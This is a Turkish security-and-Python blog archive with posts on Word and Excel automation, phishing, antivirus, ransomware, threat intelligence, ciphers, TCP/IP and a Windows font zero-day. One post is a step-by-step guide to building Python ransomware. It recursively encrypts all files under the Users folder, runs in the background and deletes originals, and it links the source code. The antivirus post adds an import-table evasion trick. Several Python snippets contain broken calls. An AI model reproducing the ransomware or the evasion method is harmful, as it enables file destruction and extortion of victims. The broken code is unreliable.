Persona Non Grata

Python Word İşlemleri

2020-04-19T19:14:34.914Z

Bu yazımızda Python’da word dosyası oluşturmayı inceleyeceğiz. İlk olarak docx kütüphanesinin kurulumunu gerçekleştiriyoruz.Kurulum için komut satırına ;

pip install python-docx

Kütüphanemiz kurulmuş oluyor. Şimdi idemizden proje oluşturarak betiğimizi yazmaya başlıyoruz. ilk olarak kütüphaneyi dahil ediyoruz.

from  docx import Document

Dosya Yaratmak

document = Document()
document.save('PersonaNonGrata.docx')

Excel yazımı okuyan arkadaşlar için anlamakta zorunlanıcağınız bir kütüphane olduğunu düşünmüyorum. PersonaNonGrata isimli word dosyası Python dosyamızla aynı dizine oluşturuldu.Herhangi bir dizine oluşturmak için save() fonksiyonuna dizin adresi de yazılabilir.

document.save('C://PersonaNonGrata.docx')

Var olan Dosyayı Açmak

document = Document("PersonaNonGrata.docx")

İçeriğini Düzenlemek

Başlık eklemek için add_heading() fonksiyonu kullanılır.Başlık seviyesi belirtilmezse varsayılan olarak Başlık 1 seçer.Başlık seviyesini ayarlamak için level parametresine 1 ile 9 arasında değerler verilir.

document.add_heading("İşimiz yok blog yazıyorum bende :)",level=7)

Paragraf eklemek için add_paragraph() metodu kullanılır.Bu fonksiyon word dosyasında yer alan son paragraftan sonra ekleme yapar.

document.addparagraph("Yeni Paragraf")
document.addparagraph("Daha Yeni Paragraf")
document.add_paragraph("Allahım bu nasıl bir paragraf")

Tablo Eklemek için add_table() fonksiyonu kullanılır.Parametre olarak tablonun satır ve sütun sayısı verilir.

tablo=document.add_table(rows=2,cols=2)
tablo.cell(0,0).text="Persona"
tablo.cell(0,1).text="Non"
tablo.cell(1,0).text="Grata"

Resim Eklemek için add_picture() fonksiyonu kullanılır.Parametre olarak genişlik ve yükseklik değerleri verilebilir.Genişlik Ve Yüksekliği inç cinsinden vermek için projeye kütüphanede yer alan Inches özelliği dahil edilmelidir.

from docx.shared import Inches

Sonrasında ;

document.add_picture("Kolpacino.png")  #yada

document.add_picture("Kolpacino.png",width=Inches(2.0),height=Inches(2.0))

Sayfa Sonu Eklemek için add_page_break() fonksiyonu kullanılır.Şuana kadar dosya üzerinde yaptığımız işlemlerin çıktısı şu şekildedir.

Çıktı aşağıdaki gibi olucaktır.

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır. Telegram grubumuzakatılın.

Phishing (Oltalama veya Yemleme) Saldırısı Nedir?

2020-04-18T10:18:11.884Z

Phishing saldırıları genellikle kullanıcı isimleri, şifreler, kredi kartı bilgileri, ağ kimlik bilgileri gibi hassas ve gizli bilgilere ulaşmak amacıyla yapılan saldırılardır.

Saldırgan kişiler özellikle bankalar, mail servisleri, alışveriş siteleri, sosyal paylaşım ağları (Facebook, Twiter, Myspace, İnstagram vb.) gibi arkadaşlık veya anlık sohbet sitemleri, online oyunlar gibi kullanıcı adı ve parola kullanarak giriş yapılan sistemlerin bir kopyasını hazırlayarak ilk adımı atarlar.

Örneğin

Burada amaç; hedef kişiye gönderilen e posta veya mesajda, kurbanın istediği veya ihtiyacı olduğu bir şey olduğuna inandırmaktır. Mesela müşterisi olduğu bankadan gelen bir istek veya şirketindeki çalışma arkadaşından gelen e-posta gibi inandırmaktır. Phishing dolandırıcıları, mağdurlarının hassas bilgilerini sağlama konusunda onları kandırmak için e-posta dışında onların telefon görüşmelerini, kısa mesajları ve sosyal medya araçlarını da kullanabilir.

Saldırganlar ellerinde mevcut olan e-posta listelerine veya hedefledikleri kişilere gönderdikleri e-postalarla kurbanlarını hazırladıkları sayfalara yönlendirirler.

Kurbanların sahte sayfalara girerek istenen bilgileri paylaşmasıyla saldırır amacına ulaşılmış olur.

Phishing, geçmişi 1990’lara dayanan en eski siber atak türlerinden biridir ve giderek çok özel hale gelen phishing mesajları ve teknikleriyle günümüzde oldukça yaygındır.

Hem bireyler hem de kurumlar phishing saldırısına maruz kalabilir. Neredeyse her tür kişisel ve kurumsal veri dolandırıcılık yapmak veya kuruluşun ağına sızmak için değerli olabilir.

@KomutanLogarMI tarafından Persona Non Grata için hazırlanmıştır. Telegram grubumuza katılın.

Python Excel İşlemleri

2020-04-18T08:26:19.931Z

Python Excel Dosya İşlemleri yazımızda Python’da excel dosyaları üzerinde işlem yapmayı inceleyeceğiz.İlk olarak sistemimize openpyxl modülü nü kurmamız gerekmektedir.Modül kurulumu için işletim siteminin türüne göre komut satırından ;

pip install openpyxl

komutu ile gereken kurulumu tamamlıyoruz. Kullandğığımız Python idesinden projemize modülü dahil edelim;

from openpyxl import *

Dosya Oluşturma ve Kayıt Etme

İlk olarak Excel'de çalışacağımız kitabı tanımlıyoruz.

kitap = Workbook()

Daha sonra Excel dosyamızda sayfa(Worksheet) açmalıyız.

ilk_Sayfam = kitap.active

Excel dosyası oluşturulduktan sonra kayıt edilerek dosya kapatılır.Dosyanın kayıt edileceği dizin belirtilmezse Excel dosyası Python dosyası ile aynı dizine kayıt edilir.

kitap.save("dosya.xlsx")               #kitap.save(dizin//dosya.xlsx)
kitap.close()                          #Kitabı kapatıyoruz.

Sayfa İşlemleri Nasıl Yapılır ?

kitap adında Workbook() açtığımızı varsayıyorum ve yeni bir çalışma sayfası eklemek istiyorum. Unutmamak gerekirki "calismasayfasi1" adında bir sayfa varsa onu silicek ve yeniden aynı isimde sayfa açıcaktır. Dikkatli olmalısınız.

kitap.create_sheet("calismasayfasi1")

Hangi çalışma sayfasında çalıştığımızı görmek istersek ;

kitap.get_active_sheet()

Herhangi bir çalışma sayfasını silmek ister isek;

remove_sheet("calismasayfasi1")

Dosyaya İçerik Nasıl Ekliyebiliriz ?

Satır ve Sütun Belirtmeden Veri Girişi;

Ekleme yaparken append metodu kullanılır.Bu metot parametre olarak list,tuple,range veya generator veya dict veri tiplerinden parametre alır.

kitap = Workbook()
sheet = kitap.active
sheet.append(("Persona","Non","Grata"))
sheet.append(["Siber","Yazılım","Topluluk"])

kitap.save("dosya.xlsx")
kitap.close()

Çıktıdan da anlaşılacağı üzere append metodu her tekrarlandığında yeni bir satıra geçmektedir.Eğer ekleme yapmak istemiyorsak o sütunu boş bırakmamız yeterli olucaktır.

Hücrelere Belirterek Veri Girişi ;

Python’da istenilen herhangi bir hücreye veri yazmak için çalışma sayfasına ait hücre adı belirtilir.

kitap = Workbook()
ilk_Sayfam = kitap.active
ilk_Sayfam["A2"]="Persona"
ilk_Sayfam["A3"]="Non"
ilk_Sayfam["B5"] ="Grata"
kitap.save("dosya.xlsx")
kitap.close()

İstenilen hücreye veri yazdırmanın bir diğer yolu da hücrenin koordinatlarını belirtmektir.

kitap = Workbook()
ilkSayfam = kitap.active
ilkSayfam.cell(row=3,column=3,value="Persona Non Grata")
kitap.save("dosya.xlsx")
kitap.close()

Veriye Sahip Excel Dosyasını Açmak ve Düzenlemek

Belirttiğimiz dizinde yada Python projemizin dizininde bulunan Excel dosyasını işlemek istiyorsak;

kitap = load_workbook("dosya.xlsx")

Excel dosyamızı yükledik şimdide içersinde veri değiştirmek nasıl yapılır görelim :)

from  openpyxl import *
kitap = loadworkbook("dosya.xlsx")
ilkSayfam=kitap.createsheet("calismasayfasi1",1)
ilkSayfam.cell(row=5,column=2,value="Persona Non Grata")
kitap.save("dosya.xlsx")
kitap.close()

Excel Dosyalarımdan Nasıl Veri Okuyabiliriz ?

İstenilen Hücreden Veri Okumak

Excel dosyamız içerisinde D2 ve B5 ve D5 hücrelerinde Siber , Yazılım ve Topluluk verileri olsun. Bu verileri okuyup ekrana yazdıralım.

from  openpyxl import *
kitap = load_workbook("dosya.xlsx")
sheet=kitap.active
d2=sheet['D2']
d5=sheet["D5"]
b5=sheet.cell(5,2)

print(d2.value)
print(d5.value)
print(b5.value)
kitap.close()

Satır Satır Veri Okumak

Aşağıdaki gibi bir Excel dosyamız olduğunu varsayalım.

from  openpyxl import *
kitap = load_workbook("dosya.xlsx")
sheet=kitap.active
for row in sheet.iter_rows(min_row=1, min_col=1, max_row=4, max_col=2):
    for cell in row:
        print(cell.value ,end=" ")
    print()

kitap.close()

Dosyadaki satırları okuyabilmek için iter_rows() fonksiyonunu kullandık.Bu fonksiyon parametre olarak okunacak minimum ve maksimum satır, sütun değerlerini parametre alır.+ satır ve 2 sütunda veri olduğu için 4 ve 2 değerleri verilmiştir.Eğer belirtilen maksimum değerlerinin kapsadığı sütunlarda veri yok ise None değeri döndürür.

Sütun Sütun Veri Okumak

Verileri sütun sütun okumak için iter_cols() fonksiyonu kullanılır.Bu fonksiyonda okunacak satır ve sutun değerlerini minumum ve maksimum olarak parametre alır.

Aynı örnek dosyamız içerisinde yer alan A sütununun değerleri okuyalım;

from  openpyxl import *
kitap = load_workbook("dosya.xlsx")
sheet=kitap.active
for row in sheet.iter_cols(min_row=1, min_col=1, max_row=4, max_col=1):
    for cell in row:
        print(cell.value )
kitap.close()

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır. Telegram grubumuzakatılın.

Antivirüs Programları Nasıl Çalışır ?

2020-04-17T04:24:41.352Z

Firmalar antivirüs programlarıyla birbirleriyle yarışırken, en iyi yöntemlerle zararlı yazılımları tespit etmek için adeta yarışmaktadırlar. Peki antivirüs yazılımları nasıl çalışıyor.Virüsleri nasıl tespit ediyorlar. Ne kadar güvendeyiz ?. Persona Non Grata için derledik. :)

Virüs Nedir ?

Özetle, Virüsler aslında "çalıştığı zaman farklı zararlar veren" bilgisayar programlarıdır. Eğer bu programlar (yada virüs kodları) herhangi bir şekilde çalıştırılırsa kodlanma şekline göre bilgisayarımıza zarar vermeye başlar. Firmalar ise virüsleri engellemek için antivirüs programları geliştirmeye başlamışlardır.

Nasıl Tespit Edilirler ?

İlk çıkan virüsler de mantık çok basitti, bilinen bir virüsün hex kodu (16 ‘lık sayı siteminde kodlanmış hali) karşılaştırma için örnek olarak alınır, tarama yapılacağı zaman da bu imza bütün dosyaların içinde aranırdı. Eğer imzaya başka bir dosyada rastlanırsa virüs olarak algılanıp silinirdi. Bu yöntem virüslerin ilk başladığı zamanlar yani 1990'larda çok popülerdi. Ancak on yıl sonra 2000 lerde bu yöntem değişmeye başladı ve trojan, keyloger, worm antivirüs yazılımcılığı yeni ilgi alanı olmaya başladı.

Peki Antivirüs Programı Nasıl Çalışır?

Tabi ki zaman ilerledikçe mutasyona uğrayan virüsler yazılmaya başlandı, Çeşit çeşit cyrpterlar ve packerlar (şifreleyiciler) çıktı. Antivirüslerde hantallaşsa da bu konuda kendini geliştirdi. Örneğin dinamik tarama, statik tarama , heuristic(sezgisel) tarama gibi yöntemler kullanılmaya başlandı ve artık antivirüsler aptal programlar olmaktan çıktı.

(Tabi kodlayan @keyiflerolsun değilse)

Statik tarama; dosya hard diskte iken yani çalışmazken yapılan taramaydı ve bunu atlatmak mümkündü. GetProcAddress(DLL dosyalarına direk bağlanma) ve LoadLibrary (yüklü dosya) kullanılarak virüsün adresini aldıktan sonra fonksiyon gösterici çağırarak, import(içeri aktarım) tablosunu tertemiz yapılabiliyor.

Antivirüsler Virüsü Nasıl Tespit Ederler ?

Ama asıl konu programınram da aktif halde olduğunda kontrolüdür. Programın şüpheli davranışları takip edilir, program herhangi bir yere ek dosya çıkarıyor mu, windows registry (Windows sistem ayarlarının tutulduğu veri tabanı) dosyasına erişim yapıyor mu, registry'nin neresine erişip neleri değiştiriyor, hangi fonksiyonları kullanıyor? Burada önemli olan konu ise fonksiyonları doğrudan adresini kullanarak fonksiyon göstericiler ile kullanmak (yani sahte bir Windows dosyası gibi davranır).

Heuristic(sezgisel) yöntem denilen son yıllarda çıkan bir tarama tekniği sezgisel ya da buluşsal bir problem çözme tekniğidir. Sonucun doğruluğunun kanıtlanabilir olup olmadığını önemsememektedir fakat genelde iyiye yakın çözüm yolları elde eder. Sezgisel algoritmalar ise geçiş süresinde daha verimli hale gelebilmek için en iyi çözümü aramaktan vazgeçerek çözüm zamanını azaltan algoritmalardır.

Sezisel algılama (heuristic), dinamik tarama ile birlikte kullanılırsa daha iyi sonuçlar alınabiliyor. Programın kullandığı fonksiyonlara bakarak birçok zararlı yazılım tespit edilebilir. Örneğin, bir program registry apileri(uygulama arayüzü) ile registry'nin(veri tabanı dosyalarının) başlangıçta çalışacak programlar listesine kendisini ekliyorsa, aynı zamanda bu program keyboard hook apilerini(klavye takip arayüzü) kullanıyorsa, aynı zamanda socket apilerini(pin,yuva arayüzü) de kullanıyorsa, bunun kolayca bir keylogger olduğu anlaşılabilir.

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır. Telegram grubumuzakatılın.

Fidye Virüsü (Ransomware) Nedir?

2020-04-15T15:19:33.419Z

Fidye yazılımları, bir cihazı kitliyebilen veya sahibinden para elde etmek için içeriklerini şifreliyebilen kötü amaçlı yazılımlardır. Operatörler ödeme karşılığında, etkilenen makineye veya verilere erişimi yeniden sağlıyacağınızı söylerler. Tabi yersen :)

İlk Kez Ne Zaman Görüldü ?

Fidye yazılımlarında ilk olarak 1989'da yaşanan AIDS Truva Atı olarak söylenebilir. Yüksek sayılarda disket posta yoluyla dağıtıldı ve kullanıcıların kendi verilerine erişmeleri engellenmiştir.

AIDS Truva atı talep ettiği fidye olan (ya da fidyecinin adlandırması ile “lisans ücreti”) 189 Doların( Acaba o zaman dolar kaç TL idi :D ) Panama'da bir postane kutusuna gönderilmesini istedi. Yazarın Joseph Popp olduğu belirlendi; Ancak yetkililer, akıl sağlığının duruşmaya katılması için uygun olmadığını ilan ettiler.

Fidye yazılımları 2010 tarihinden sonra siber dünyamızda saldırganlar için güzel bir gelir kaynağı olarak görülmeye başlanmıştır. Her geçen gün farklı türleri çıkarar gelişmeye ve artmaya devam etmektedir.

Yayınlanan raporlara bakıldığı zaman fidye virüslerinin 2017 sonu ile 3 kattan fazla artış gösterdiği görülmektedir. Saldırı hedeflerinde genelde Öneme sahip kamu kuruluşları,m Altyapılar, Hastaneler, Üniversiteler ve Büyük şirketler hedef alınmaktadir tabi bu bizlerede bulaşmıyacağı anlamına gelmiyor arkadaşlar.

2017 yılında Barkly firması tarafından yayınlanan istatistiklere göre, şirketler ortalama 40 saniye de bir fidye yazılım saldırısına uğramakta ve her 10 zararlı yazılımdan 6 adedi fidye zararlısı olarak karşımıza çıkmaktadır. İncelemek isteyenler için adresi bırakıyorum.

Nasıl Korunabiliriz?

Güncel Bir Antivirüs Yazılımı Kullanmalısınız.

Bot yazılım yada korsan şahıs bilgisayarınıza erişse bile antivürüs yazılımınızı devre dışı bırakması zorlaşsın.

Kullandığınız İşletim Sisteminin Güncel Olmasına Özen Gösteriniz.

Hala Xp kullanıyorsanız size söyliyecek bir şeyim yok malesef :)
Windows 7 kullanıpta güncellemeleri kapattıysanız yine utanmaya devam edebilirsiniz. (Windows 7 desteği 14 Ocak 2020 tarihinde sona erdi :( )
Sadece işletim sistemi olarak bakmamak gerekir aslında, Tüm yazılımlarınızı yamalı ve güncel tutmaya özen gösteriniz.

Gölge Kopyayı Etkinleştirmelisiniz.

Windows 7'de gölge kopya etkinleştirmek için Sistem Özellikleri’ne gidin ve Yapılandır diyerek bölümlenmiş disklerde tek tek gölge kopyayı açın. Windows 10'da ise gölge kopya için Ayarlar > Güncelleştirme ve Güvenlik > Yedekleme kısmında Dosyalarımı Otomatik Olarak Yedekle seçeniğini açın.
Windows 10 gölge kopya işlemi için 2. bir disk istiyor. Gölge kopya oluşturduktan sonra mutlaka Windows’unuzu admin yetkisi ile kullanmayın. Tabi bu fidye için geçerli bir durum. Silinmelere karşı korumak isterseniz kullanabilirsiniz.

Sizler için python ile kodladığımız Fidye Virüsü örneğimizide buraya bırakıyorum.

Bunu atmadan yazımı bitiremem malesef :(

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır.Telegram grubumuzakatılın.

Siber İstihbarat Nedir ?

2020-04-12T23:02:53.228Z

Siber istihbarat, tehdit tespiti, önceliklendirme veya acil durum müdahalesi gibi belirli konulardaki kabiliyetlerini iyileştirme ve geliştirme açısından organizasyonlar için kritik öneme sahiptir. Siber istihbarat, BT departmanının ağındaki mevcut ve olası tehditleri tespit etmek ve olaya etkili biçimde müdahale etmek için ihtiyaç duyduğu bilgi olarak tanımlanabilir. Siber istihbarat, organizasyonların tehdit araştırmaları ve analiz süreçlerinin bir çıktısıdır. Siber istihbarat söz konusu olduğunda, organizasyonlar ağlarındaki en güncel tehditlere odaklanırlar.

Genel siber suçlara bakarsak siber saldırılar sırasında veya saldırıdan sonra ki önlemlerin yeterli olmadığını görürüz. Çünkü siber saldırılar her geçen gün farklı vücutlara bürünürcesine değişmektedir. Bu noktada siber istihbarat veya siver tehdit istihbaratı devreye giriyor.

Siber tehdit bir veri iletişim yolunu kullanarak bir kontrol sistemi cihazına ve / veya şebekesine yetkisiz erişime teşebbüs etme ya da bir bilgisayar ağını bozma veya bozma olasılığı olarak tanımlanmıştır. Kurum ve kuruluşlara yönelik tehditler, düşman hükümetler, hacktivist gruplar, terörist gruplar, hoşnutsuz çalışanlar ve kötü niyetli davetsiz misafirler de dahil olmak üzere çok sayıda kaynaktan gelebilir. Düşmanların strateji ve taktiklerini, kullandıkları silahları, lojistik ve savaş alanı hakkında bilgi sağlayan iletişim ve kontrol sistemlerinden bahsetmeden bir savaş tarif edemezsiniz. Aynı şey, siber tehditler için de geçerlidir. Anlaşılmasını zorlaştıran tek şey, etkilerinin genellikle daha az açık olmasıdır. Bununla birlikte, saldırıların amaçları, motivasyonları ve teknikleri çoğunlukla aynıdır.

Siber Tehdit İstihbaratı Nedir?

Siber tehdit istihbaratı, kurum ve kuruluşlara herhangi bir seviyede iş unsurları ve güvenliğine zarar verebilecek tehditler hakkında tanımlanmış, toplanmış ve zenginleştirilmiş verilerin bir süreçten geçirilerek analiz edilmesi sonucu saldırganların "motivasyonlarını" “niyetlerini” ve “metotlarını” tespit etmektir.

Siber Tehdit İstihbaratı Amacı Nedir?

Siber tehdit istihbaratının başlıca amacı ise kurum ve kuruluşlara dışarıdan gelen (harici) ve en yaygın ve tehlikeli tehdit risklerini anlamalarına yardımcı olmaktır. Bu saldırılar örneğin 0-day saldırıları, geliştirilmiş kalıcı tehdit APT (Advanced Persistent Threat) ve exploitler olabilir. Buna rağmen tehdit unsurları içeriden (dahili) saldırılar da olabilir. Bu tarz saldırılar kurum ve kuruluşların yapısına çok ciddi zararlar vermektedir.

Tehdit istihbaratı, kurum ve kuruluşların kendilerini bu tarz saldırılardan korumasına yardımcı olmak için geniş kapsamlı ve derin bir veriye ihtiyaç duymaktadır. Günümüzden 10 yıl öncesine kadar IT sektörü en çok kitle saldırılarından(mass attack) korkmaktaydı; fakat artık hedef odaklı saldırıları tespit etmek oldukça güç olmakla birlikte kurum ağı içerisinde neredeyse sadece bir “parazit” gibi görülmektedir ve tespit etmek oldukça zorlaşmaktadır.

Siber güvenlik şirketleri artık herhangi bir saldırıdan alınan ilk örnekler ile zararlı yazılım imzaları ve IP adresleri, md5 hash özetleri ve URL adresleri, botnet komuta merkezi domain isimleri gibi IOC(indicator of compromise) verilerini tespit etmekte ve paylaşmaktadır. Saldırılar ilk kez gerçekleştikten sonra kurum ve kuruluşların bazıları zarar gördükten sonra ilk örnekleri kurum ağları içerisinde gerekli yazılım ve mimariyle tespit etmek kolaylaşmaktadır.

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır. Telegram grubumuzakatılın.

Fidye virüsü kodluyoruz :)

2020-04-06T12:23:21.857Z

Selamlar

Bu yazıda WannaCry'ın merdiven altı Python fidye virüsümüzü yazacağız .

Kodlara gelmeden evvel nasıl olacağını açıklayalım

os modülü ile bütün alt klasörleri listele

"rb" ile dosyayı aç

cryptography modülü ile içeriği şifrele

(kendi şifreleme methodunuzu da kullanabilirsiniz)

aynı dosyayı wb ile aç ve şifrelenmiş içeriği içine yaz

Işte bu kadar basit :)

Gelelim şifrelemenin nasıl yapılacağına

from cryptography.fernet import Fernet

İle modülümüzü dahil edelim .

Şimdi anahtar eklememiz gerekiyor ;

anahtar = Fernet.generate_key()

Şimdi fer'e şifrelememizi aktaralım

fer = Fernet(anahtar)

fer bizim encrpt ve decpyt yapabileceğimiz değerimiz

>> fer.encrypt("Bu yazı şifrelenecek !".encode())

>> b'gAAAAABeigI2PUz7vW4RlT_9peTEtTSgCUs6yypDfsHOgfyPpnfVYOqI7c='

Bu kadar basit aslında işlemimiz ..

Mantığımızı kavradığımıza göre alt klasörleri listeyelim

import os

for dosya_konum,eleman,dosya_isim_liste in os.walk("\\Users"):

for dosya_isim in dosya_isim_liste:

print(dosya_konum+dosya_isim)

Burada açıklanacak tek şey os.walk("\\Users") kavramı ;

os.walk() Kendisine verilen değerden itirabaren lat klasörleri listeyen oldukça faydalı bir modül

\\Users değerini vermemiz ise Tüm Windowslarda Users'ın olması ve tüm kullanıcıları şifrelemek istememiz

Aşağıdaki kodu çalıştırıp gerçekten de tüm alt klasörleri listeleyeceğini görebilirsiniz

Yapacağımız herşey aslında bu kadardı :)

Tekrar geçelim;

os.walk ile listele

listenen dosyaların hepsini wb ile aç , şifrele yaz

Şimdi gelelim asıl kodlarımıza

png_fidye

Görselde bahsettiğim kütüphaneler dışında "daemon" adlı bir modülü daha fark etmişsinizdir

Bu modül sayesinde python kodlarımızı "arkaplanda" çalıştırabileceğiz.

os.remove() 'ı kullanma sebebimiz ise python'un kapandığını sanan hedef programı baştan açmaya çalışacaktır . Bunu dosyayı silerek hallediyoruz :)

Kaynak Kodları:

https://github.com/PersonaNonGratae/pngfidye

Not:

Kodları değiştirmeden doğrudan kendi bilgisayarınızda çalıştırırsanız tüm dosyalarınız kullanılamaz hale gelecektir .

Şifrelenmiş dosyayı açmak için kodların 2 parçasını değiştirmek yeterli olacaktır :

Satır 40 : key = input("key'inizi girin !").encode()

Satır 55 : with open(dosya,"wb") as yaz : yaz.write(fer.decrypt(oku))

@raifpy tarafından Persona Non Grata için hazırlanmıştır . Telegram grubumuza katılın.

Sezar Şifreleme Yöntemi Nedir?

2020-04-05T14:10:50.655Z

Sezar şifresi bilinen en eski şifrelerden biridir. Düz metindeki her harfin alfabeden belirli sayıda yere 'kaydırıldığı' bir tür şifredir. Örneğin, 1 değerindeki bir kayma ile A'nın yerine B, B yerine C olur.

Vigenère şifresi gibi daha karmaşık şifreleme şemaları , Sezar şifresini şifreleme sürecinin bir unsuru olarak kullanır. Yaygın olarak bilinen ROT13 'şifreleme', 13 ofseti olan bir Sezar şifresidir. Sezar şifresi aslında hiçbir iletişim güvenliği sunmaz ve elle bile kolayca kırılabileceğini görüceksiniz :)

Örnek

Şifrelenmiş bir mesajı bir kişiden diğerine geçirmek için, ilk olarak her iki tarafın şifre için 'anahtarı' olması gerekir, böylece gönderenin mesajı şifreleyebilmesi ve alıcının şifresini çözebilmesi gerekir. Sezar şifresi için anahtar, şifre alfabesini kaydırmak için kullanılan karakter sayısıdır.

İşte, sezar şifresiyle ilgili şifreleme ve şifre çözme adımlarına hızlı bir örnek. Şifreleyeceğimiz metin 'Persona Non Grata', 1 kaydırma ile şifreliyelim. (anahtar).

Matematiksel Açıklama

İlk önce tüm karakterlerimizi sayılara çeviriyoruz, 'a' = 0, 'b' = 1, 'c' = 2, ..., 'z' = 25. Artık sezar şifreleme şifreleme işlevini (e (x)) temsil edebiliriz; burada x, şifrelemekte olduğumuz karakterdir.

Burada k, her harfe uygulanan anahtardır (kaydırma). Bu işlevi uyguladıktan sonra sonuç, daha sonra bir harfe geri çevrilmesi gereken bir sayıdır. Şifre çözme işlevi:

Şimdide Python ile kendi Sezar Şifreleme Betiğimizi nasıl yazabiliriz bakalım.

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır.Telegram grubumuzakatılın.

Sen de mi Brutus? -Gaius Julius Caesar

TCP/IP Nasıl Çalışır ?

2020-04-02T22:53:42.598Z

Bilgisayarlarımız aralarında birbirleriyle iletişim kurmalarını sağlamak için protokollere ihtiyaç duyarız. Bu yazımda TCP/IP protokollerini anlatacağım.

Açılımı Transmission Control Protocol/Internet Protokol olan TCP/IP internetin temel protokollerini içeren bir pakettir. Bir çok protokolün bir araya gelmesi ile oluşmuştur. TCP kısmı veri transferinde önemli noktaları belirtirken IP kısmı taşıma yolunu bulmayı belirtir. Protokol yapısı Uygulama Katmanı, Taşıma Katmanı, İnternet Katmanı, Ağ Erişim Katmanı ve Fiziksel Katman olmak üzere 5’e ayrılır. Bu referans modelinde 4 farklı katmanda 15’ten fazla protokol vardır. Veriler bu katmanlar arasında sırasıyla paketlenerek gönderilir, alıcıda ise paketlemenin tersi sırayla teker teker açılarak veri ulaştırılmış olur.

Peki Protokol Nedir ?

Protokoller cihazlar arası iletişimde kullanılan, iletişim kurallarını belirleyen ağ dilleridir. Referans modelinin her katmanda ayrı protokoller görev yapar. Farklı referans modellerinde aynı protokoller çalışabilir.

1) Uygulama Katmanı
Bu katmanda gönderilecek veri tipi ve veriyi işleyen uygulamalar bulunur. Örneğin bir HTML web sayfası ve bu veri tipini kullanan HTTP protokolü bu katmandadır. OSI modelindeki sunum ve oturum katmanları TCP/IP modelinde uygulama katmanı içerisinde yer alır. E-Posta gönderimi için kullanılan SMTP ve dosya gönderimi için kullanılan FTP protokolleri bu katmanda bulunur.

2) Taşıma Katmanı
Bu katmanda verinin nasıl gönderileceği belirlenir. Veri güvenliği, hata kontrolü gibi işlemler yapılır. TCP ve UDP bu katmandadır. TCP klasik veri aktarımında UDP ise medya aktarımında kullanılır. TCP, UDP ye göre daha güvenli fakat daha yavaş çalışır. Çünkü TCP 'de gönderilen her veri paketinin ardından verinin yerine doğru bir şekilde ulaşıp ulaşmadığı kontrol edilir.

3) İnternet Katmanı
Routerlar ile birbirine bağlanmış ağlar boyunca verinin kaynaktan hedefe yönlendirilmesini sağlar. Bu akışı sağlayan kaynak ve hedef adres bilgileri internet katmanında saklanır

4) Ağ Erişim Katmanı
Uç sistem ile ağ arasındaki lojik arabirime ilişkin katmandır. Verilerin fiziksel olarak 1 ve 0’lara dönüştürülerek taşınması sağlanır.

5) Fiziksel Katman

İletişim ortamının karakteristik özelliklerini, sinyalleşme hızını ve kodlama şemasını belirler. Veri kablo tipine (veya kablosuz) göre elektrik sinyallerine veya elektromanyetik dalgalara dönüştürülür.

Katmanlar ve Protokollar Nasıl Çalışırlar ?

Bir web sayfasına girmek istediğimiz zaman aşağıdaki adımlar sırasıyla gerçekleşmektedir ;

Web sayfasının saklı olduğu sunucuda uygulamalar sayfanın HTML veri formatında bir çıktısını oluşturur. Ve bu veriyi HTTP protokolüyle gönder komutunu verir. Bunlar 4. katmanda yani uygulama katmanında olur. Buradan çıkan veri 3. katmana yani taşıma katmanına gönderilir.

Taşıma katmanında veriye taşıma katmanının bilgileri yani port bilgisi ve veri boyutu eklenir.

Üçüncü katmandan çıkan veri paketine ikinci katmanda verinin gönderileceği bilgisayarın (sunucunun) ve sizin bilgisayarınızın IP adresleri ve verinin son halinin boyutu eklenir.

Son katmanda yani fiziksel katmanda fiziksel adresler ve verinin yeni boyutu pakete eklenir.

Paket sunucudan çıkar ve sunucu ile sizin bilgisayarınız arasındaki binlerce kilometrelik yolu kat ederek bilgisayarınıza ulaşır.

Veri bilgisayarınıza ulaştığında bu sefer tersi sırayla katmanlardaki protokoller işletilir. Bilgisayarınız önce fiziksel katmanı ardından ağ katmanını, daha sonra taşıma ve uygulama katmanlarını işletir. Ve en sonunda kalan paketi web tarayıcınıza gönderir. Her katmanda ayrı donanımlar görev yapar.

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır. Telegram grubumuzakatılın.

Windows Zero Day Güvenlik Açığı Nedir ?

2020-03-27T15:50:28.691Z

Neden Sıfır Gün ?

“Sıfır gün” terimi, yeni keşfedilen bir yazılım güvenlik açığı anlamına gelir. Windows kusuru yeni öğrendiği için, sorunu gidermek için resmi bir yama veya güncelleme yayınlanmadı.

Dolayısıyla, “sıfır gün”, geliştiricilerin yeni ortaya çıkmış ve belki de zaten hackerler tarafından istismar edilen sorunu düzeltmek için “sıfır günleri” olduğu anlamına gelir.

Güvenlik açığı herkese açık hale geldiğinde, tedarikçi kullanıcılarını korumak için sorunu çözmek için hızlı bir şekilde çalışmalıdır.

Ancak yazılım satıcısı, bilgisayar korsanları güvenlik açığından yararlanmayı başarmadan önce bir düzeltme eki yayınlayamayabilir. Buna sıfır gün saldırı denir.

Nedir Bu Zaafiyet ?

Zafiyeti detaylarına baktığımızda iki adet zafiyet olduğunu görüyoruz. Bu iki zafiyetin Windows Adobe Type Manager kütüphanelerinde olduğu ortaya çıktı.

Zafiyetin etkin olabilmesi için saldırgan tarafından belgeyi açması veya Windows gezgini ön izleme bölümünden görüntülemesi yetiyor.

Microsoft Windows'da, Adobe Type Manager Kitaplığı düzgün bir şekilde "özel hazırlanmış bir çok ana yazı tipini - Adobe Type 1 PostScript biçimi" işlediğinde, uzak saldırganların bir kullanıcıyı özel olarak açmaya ikna ederek hedeflenen sistemlerde rastgele kötü amaçlı kod yürütmesine izin verdiğinde ortaya çıkar hazırlanmış bir belgeyi veya Windows Önizleme bölmesinde görüntüleyebiliyor.

Geçici Çözümler Nelerdir ?

Windows gezgininde önizleme bölmesini ve ayrıntılar bölmesini devre dışı bırakın.

Windows kullanıcılarının fırsatçı saldırılar tarafından saldırıya uğrama riskini azaltmak için Windows Gezgini'nde Önizleme Bölmesi ve Ayrıntılar Bölmesi özelliğini devre dışı bırakmaları önemle tavsiye edilir.

Önizleme Bölmesi ve Ayrıntılar Bölmesi özelliğini devre dışı bırakmak için:

Windows Gezgini'ni açın, Düzenle'yi ve ardından Düzen'i tıklatın.
Hem Ayrıntılar bölmesini hem de Önizleme bölmesi menü seçeneklerini temizleyin.
Düzenle'yi ve ardından Klasör ve arama seçenekleri'ni tıklatın.
Görünüm sekmesini tıklayın.
